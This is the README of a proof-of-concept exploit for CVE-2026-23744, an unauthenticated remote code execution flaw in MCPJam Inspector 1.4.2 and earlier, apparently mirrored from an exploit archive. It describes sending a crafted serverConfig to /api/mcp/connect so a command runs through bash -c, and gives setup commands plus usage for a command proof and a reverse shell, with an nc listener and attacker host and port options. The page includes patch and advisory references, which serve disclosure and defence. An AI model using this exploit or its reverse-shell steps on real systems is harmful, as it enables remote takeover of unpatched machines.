## https://sploitus.com/exploit?id=421968DD-E7AD-55D8-A392-435068CF01AE
# CVE-2026-23744 โ MCPJam Inspector Unauthenticated RCE
Unauthenticated remote code execution PoC for CVE-2026-23744. MCPJam Inspector `1.4.2` and earlier expose functionality through `/api/mcp/connect` that can launch an attacker-controlled MCP server command without authentication.
> **For authorized testing and research only. Do not use against systems you do not own or have explicit permission to test.**
---
## What it does
```text
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
```
1. Builds a crafted MCP `serverConfig` payload.
2. Targets the unauthenticated `/api/mcp/connect` endpoint.
3. Launches a configured command through `bash -c`.
4. Supports safe command validation and reverse shell payloads.
5. Provides dry-run/debug modes for payload inspection before sending traffic.
---
## Setup
```bash
git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
```
---
## Usage
### Safe command proof
```bash
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
```
### Reverse shell
Start a listener first:
```bash
rlwrap nc -lvnp 4444
```
Then run:
```bash
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
```
Useful options:
```text
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
```
---
## Affected
| Product | Affected Version | Access Required | Impact |
|---------|------------------|-----------------|--------|
| MCPJam Inspector | `<= 1.4.2` | None | Remote command execution as the MCPJam Inspector process user |
The issue is especially exposed when MCPJam Inspector listens on `0.0.0.0`, allowing remote hosts to reach the development service.
---
## Notes
- The PoC sends a JSON payload to `/api/mcp/connect`.
- The command is passed through `serverConfig.command` and `serverConfig.args`.
- Prefer `--cmd` for safe validation before attempting a reverse shell.
- Use `--dry-run --debug` to inspect the generated request without touching a target.
- Version `1.4.3` contains the upstream patch according to NVD.
---
## References
- [NVD โ CVE-2026-23744](https://nvd.nist.gov/vuln/detail/CVE-2026-23744)
- [GitHub Security Advisory โ GHSA-232v-j27c-5pp6](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6)
- [Patch commit](https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a)
- [MCPJam Inspector](https://github.com/MCPJam/inspector)
---
## Author
ozcanpng โ [github.com/ozcanpng](https://github.com/ozcanpng) โ [ozcanpng.dev](https://ozcanpng.dev)